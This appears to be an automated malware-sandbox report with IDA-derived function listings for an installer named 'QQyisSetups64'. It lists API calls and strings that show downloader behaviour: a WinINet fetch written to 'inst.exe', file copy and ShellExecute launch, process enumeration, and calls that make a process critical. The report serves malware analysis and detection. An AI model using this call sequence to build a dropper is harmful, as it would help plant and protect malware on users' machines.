Fu, xrefs: 0286025A
Cach, xrefs: 028601FA
yA, xrefs: 02860125
ee, xrefs: 028600F0
Ta, xrefs: 0286027D
b, xrefs: 02860113
Syst, xrefs: 02860219
t, xrefs: 02860187
b, xrefs: 02860287

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
API String ID: 2032221330-2899676511
Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
Instruction ID: 20b1533ca945967a01a7202aa5fb22a40f2745df98c920629b603b0611bc0325
Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
Instruction Fuzzy Hash: D1628A395083858FD720CF24C844BABBBE5FF94704F04492DE9C9DB292E7719948CB9A

Function 10001BB0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 143
networkfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 10001BCA
InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 10001BE6
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,10012458,?,10001BA3,?,?,?), ref: 10001BF8
HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10001C2D
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10001C4A
InternetReadFile.WININET(?,?,00001000,?), ref: 10001C65
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10001C8E
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 10001D1B
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10001D2B
InternetCloseHandle.WININET(?), ref: 10001D38
InternetCloseHandle.WININET(?), ref: 10001D42
GetParent.USER32(?), ref: 10001D4C
ShowWindow.USER32(?,00000000), ref: 10001D5B
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10001D93

Strings

URLDownloader, xrefs: 10001BC5
inst.exe, xrefs: 10001D61

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindowexitfclosefopenfwrite
String ID: URLDownloader$inst.exe
API String ID: 3413257080-3182466430
Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
Instruction ID: ddbd601f5f187a188268b5c7d9f2a971705c802d5f1a5a55912b1b5dcc305942
Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
Instruction Fuzzy Hash: 2A5109B5D40219ABEB04DFA4CC85FEEB775FF48741F108209F605BA290D774AA90CB61

Function 1000F260 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000F26D
Process32FirstW.KERNEL32(000000FF,0000022C), ref: 1000F298
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(Function_0000D110), ref: 1000F2C1
CloseHandle.KERNEL32(000000FF), ref: 1000F2CB

Strings

Failed to retrieve first process., xrefs: 1000F2A2

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@CloseCreateD@std@@@std@@FirstHandleProcess32SnapshotToolhelp32U?$char_traits@V01@@
String ID: Failed to retrieve first process.
API String ID: 592929778-1967016982
Opcode ID: c852dc96d88058524c01f60ee48262a4910037a9236e4f06e5116644cdcb3d29
Instruction ID: 0ce586cc59c24ae6f6b9b608917b68c1bdf63cf15262094913b6f28177916ec4
Opcode Fuzzy Hash: c852dc96d88058524c01f60ee48262a4910037a9236e4f06e5116644cdcb3d29
Instruction Fuzzy Hash: 0D1196B4900218FFEB10EFB0CD89AAE77B8EF08391F104699E90597155D734EB54EB50

Function 1000EE80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
RpcBindingFromStringBindingW.RPCRT4(10001D8E,00000000), ref: 1000EED9
RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 1000EF10
RpcStringFreeW.RPCRT4(10001D8E), ref: 1000EF1A

Strings

localhost, xrefs: 1000EEB3

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Binding$String$AuthComposeFreeFromInfo
String ID: localhost
API String ID: 1126441048-2663516195
Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
Instruction ID: cda66700fc1d67de1566ef6c2ee8939abb6b7c8c1a3f56331cb5e05d924021ce
Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
Instruction Fuzzy Hash: B611D7B4D00209BFEB14CFE4C985BEEBBB4FB08704F108159E605BB280D7B59A54CBA0

Function 10001A60 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitCommonControlsEx.COMCTL32(00000008), ref: 10001A93
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10001A9D
CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001AC3
SetWindowTheme.UXTHEME(00030458,10012444,10012440), ref: 10001ADE
SendMessageW.USER32(00030458,00000409,00000000,00D77800), ref: 10001AF7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001B08
CreateThread.KERNEL32(00000000,00000000,Function_00001B80,?,00000000,00000000), ref: 10001B49
PostQuitMessage.USER32(00000000), ref: 10001B54
DefWindowProcW.USER32(00000002,?,?,?), ref: 10001B6D

Strings

, xrefs: 10001A88
msctls_progress32, xrefs: 10001ABC

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
String ID: $msctls_progress32
API String ID: 1181878002-3669180086
Opcode ID: b9dbfd839ac4d6ccd5c8ee77aae33a48e54b131b2285833d3f814014fb2396b0
Instruction ID: 2e44a71670f0cdec86f34bb6316c117ddb1687e3aa8b51598d2db09470581217
Opcode Fuzzy Hash: b9dbfd839ac4d6ccd5c8ee77aae33a48e54b131b2285833d3f814014fb2396b0
Instruction Fuzzy Hash: 9431F6B4A44208FFF710DF94CC89FAA7BB5EB48741F208158FA09AB295D770E950CB65

Function 10001830 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 153
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 10001852

Part of subcall function 10001600: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
Part of subcall function 10001600: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
Part of subcall function 10001600: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE

RegisterClassW.USER32(?), ref: 100019AD
CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,10011876), ref: 100019E8
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,10011876), ref: 100019F7
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001A1E
TranslateMessage.USER32(?), ref: 10001A2C
DispatchMessageW.USER32(?), ref: 10001A36

Strings

URLDownloader, xrefs: 1000195E
inst.exe, xrefs: 10001897, 10001903, 100019D1

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: MessageWindow$CallbackClassCreateDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskTranslateUserwcstombs
String ID: URLDownloader$inst.exe
API String ID: 919245287-3182466430
Opcode ID: 0d4dfe86d5ddc5449cab5c970eae05cdbd8c2cc98e2f02f6d169f1be2c235799
Instruction ID: 02b1e0a1a7493eeed2e2321454f16a2ce6d8cc5e573885ca1cf39a898ac010b9
Opcode Fuzzy Hash: 0d4dfe86d5ddc5449cab5c970eae05cdbd8c2cc98e2f02f6d169f1be2c235799
Instruction Fuzzy Hash: 215107B5D00318AFEB54CFA4CC45BDEBBB5FB48340F108169E119A7295EB746A44CF61

Function 10010610 Relevance: 7.5, APIs: 5, Instructions: 28
threadsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 1001061D
WaitForSingleObject.KERNEL32(00000000), ref: 10010624
CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 10010639
CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 1001064E

Part of subcall function 10001170: LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
Part of subcall function 10001170: GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
Part of subcall function 10001170: RegisterClassW.USER32(?), ref: 10001211
Part of subcall function 10001170: CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236

exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001065B

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindowexit
String ID:
API String ID: 1070008423-0
Opcode ID: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
Instruction ID: b32196050963cedc899c835c863bf3fa77a81109efd19031f53f5ae39edb479e
Opcode Fuzzy Hash: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
Instruction Fuzzy Hash: 71E026B53C4354BBF265A7E05C8BF4936549B09F42F608650F309BD0E2CAF4B450C62D

Function 1000F330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1000EE80: RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE

_swprintf.LIBCMTD ref: 1000F3DC
Sleep.KERNEL32(000003E8), ref: 1000F433
Sleep.KERNEL32(000003E8), ref: 1000F484

Strings

5555555555, xrefs: 1000F3B8

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Sleep$BindingComposeString_swprintf
String ID: 5555555555
API String ID: 4095827290-304217070
Opcode ID: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
Instruction ID: fc69ec1e48ae5d690075e784bcaa941b9f802e524bc258fcaffae97851e079c3
Opcode Fuzzy Hash: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
Instruction Fuzzy Hash: 8B516DB5D00208ABEB14DFD4DC41BEFB7B8EB48340F108118FA05BB686D734AA44DBA1

Function 10010450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100045F0: SHGetFolderPathA.SHELL32(00000000,10010479,00000000,00000000,?), ref: 10004611

Part of subcall function 10010380: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100103B3

Part of subcall function 10010330: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001034E

CopyFileA.KERNEL32(00000000,?,00000000), ref: 100105A6
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 100105CC

Strings

open, xrefs: 100105C5
%s\%s, xrefs: 100104B1

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: File$ModuleName$CopyExecuteFolderPathShell
String ID: %s\%s$open
API String ID: 1638599526-538903891
Opcode ID: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
Instruction ID: 9fe97893565a199cb231c8e39f665fc81eb16fc602bb536f2ce1346a8447d072
Opcode Fuzzy Hash: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
Instruction Fuzzy Hash: ED5190B4D04248ABEB14CFA0C891BEEBBB5EF05344F508198F5557B282DB75AB88CB51

Function 1000F080 Relevance: 6.1, APIs: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1000FF70: NdrClientCall2.RPCRT4 ref: 1000FF8F

CoTaskMemFree.OLE32(00000000), ref: 1000F195
CoTaskMemFree.OLE32(00000000), ref: 1000F1A2

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: FreeTask$Call2Client
String ID:
API String ID: 3085621743-0
Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
Instruction ID: 92fa5dec9f22b8c7c1328a1cbf0c23ece76f2aec65bf6276d958f50508a6dbd7
Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
Instruction Fuzzy Hash: EB51F5B4E04209EBEF04CF94C894AEEB7B1FF48344F20815DE815A7748D735AA85EB91

Function 100045F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32(00000000,10010479,00000000,00000000,?), ref: 10004611
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(1000D110), ref: 10004659

Strings

Error retrieving folder path, xrefs: 1000463A

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@FolderPathU?$char_traits@V01@@
String ID: Error retrieving folder path
API String ID: 1878701816-3197305068
Opcode ID: a8aa29d3985f4dc8b2c07eb66a2b75d398d4273d7149b66bb2f0baa5cd437431
Instruction ID: 3c888e1c673b8af2102680abd9df1d2c946cda7a46348bc231a71b09ea3b55b1
Opcode Fuzzy Hash: a8aa29d3985f4dc8b2c07eb66a2b75d398d4273d7149b66bb2f0baa5cd437431
Instruction Fuzzy Hash: 4E012CB4A00208BBEB04DF94CC91FDD7BB5EB49344F108154FA489B254EB71AF90DB91

Function 10001600 Relevance: 4.6, APIs: 3, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: FolderFreeKnownPathTaskwcstombs
String ID:
API String ID: 2577077003-0
Opcode ID: 9388572541d754b2583f4810766f488a682949ee9bf3f64af826a3f9bef0217d
Instruction ID: 5f7cab8de45bcdf2407ecebcb5d22f8ee1252467d95dee99cd854b3eb2a3a61a
Opcode Fuzzy Hash: 9388572541d754b2583f4810766f488a682949ee9bf3f64af826a3f9bef0217d
Instruction Fuzzy Hash: 8B2117B1900219EBEB04DF94CC95BEEBBB4FF08700F108518F615AB295DB75AA44CBD0

Function 1000FF40 Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NdrClientCall2.RPCRT4 ref: 1000FF5C

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Call2Client
String ID:
API String ID: 1775071923-0
Opcode ID: ce7b8f29c0631b2804a26d986689ba3f09b2f6ec28eda86620c8604702a4acd4
Instruction ID: 7492027a281e140068cdac0bb76a9e8e76146da9bd0683f37df95b5dae096a5d
Opcode Fuzzy Hash: ce7b8f29c0631b2804a26d986689ba3f09b2f6ec28eda86620c8604702a4acd4
Instruction Fuzzy Hash: 5ED05EF190100CBBDB05CF88CC42AA977ACE784205F00C069EA0AC6200E931AA904691

Function 1000FF70 Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NdrClientCall2.RPCRT4 ref: 1000FF8F

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Call2Client
String ID:
API String ID: 1775071923-0
Opcode ID: 1bc907cd574dd29b4d3e7ba9f4424db3402ad13f32cce3c6e12345c4effb2575
Instruction ID: 6afe2523060cff6880f9b4da93d12d89cb254fb88d74a93b831ee34bf0bcd51a
Opcode Fuzzy Hash: 1bc907cd574dd29b4d3e7ba9f4424db3402ad13f32cce3c6e12345c4effb2575
Instruction Fuzzy Hash: 69D05EB190000CBBE705CF88CC12AE977ACE785305F00C069EA0A8A240E931AA544691

Function 1000FFB0 Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NdrClientCall2.RPCRT4 ref: 1000FFCF

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Call2Client
String ID:
API String ID: 1775071923-0
Opcode ID: 52255134d6b5ccea6af4de28952c25772812cd8c0d7113a6720df0c67090eddc
Instruction ID: 01a6fe9224db3f7d7e4205a28be5e1d10279d7ad68670d0b988955ce86484041
Opcode Fuzzy Hash: 52255134d6b5ccea6af4de28952c25772812cd8c0d7113a6720df0c67090eddc
Instruction Fuzzy Hash: F2D05EB190100CBBE705CF88CC02AA977ADE784305F00C169FA0A86240E931AE504691

Function 1000FFF0 Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NdrClientCall2.RPCRT4 ref: 1001000F

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Call2Client
String ID:
API String ID: 1775071923-0
Opcode ID: 8713d8677658a6df8795b9ebb9893791690b4409c7e532052509524876d5dd8e
Instruction ID: 940d55c7aea47baa15732b8373ec63bb8ecc0fa7aba131a5eb793c07d5a03037
Opcode Fuzzy Hash: 8713d8677658a6df8795b9ebb9893791690b4409c7e532052509524876d5dd8e
Instruction Fuzzy Hash: 77D05EB290000CBBE705CF88CC02AE977ACE784305F00C069EA0A86240EA31AA504691

Non-executed Functions

Function 10001170 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 87librarywindowloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
RegisterClassW.USER32(?), ref: 10001211
CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 10001251
TranslateMessage.USER32(?), ref: 1000125F
DispatchMessageW.USER32(?), ref: 10001269

Strings

RtlAdjustPrivilege, xrefs: 10001184
RtlSetProcessIsCritical, xrefs: 10001198
indow, xrefs: 1000122B
ntdll.dll, xrefs: 10001176
ndowClass, xrefs: 10001206, 10001233

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
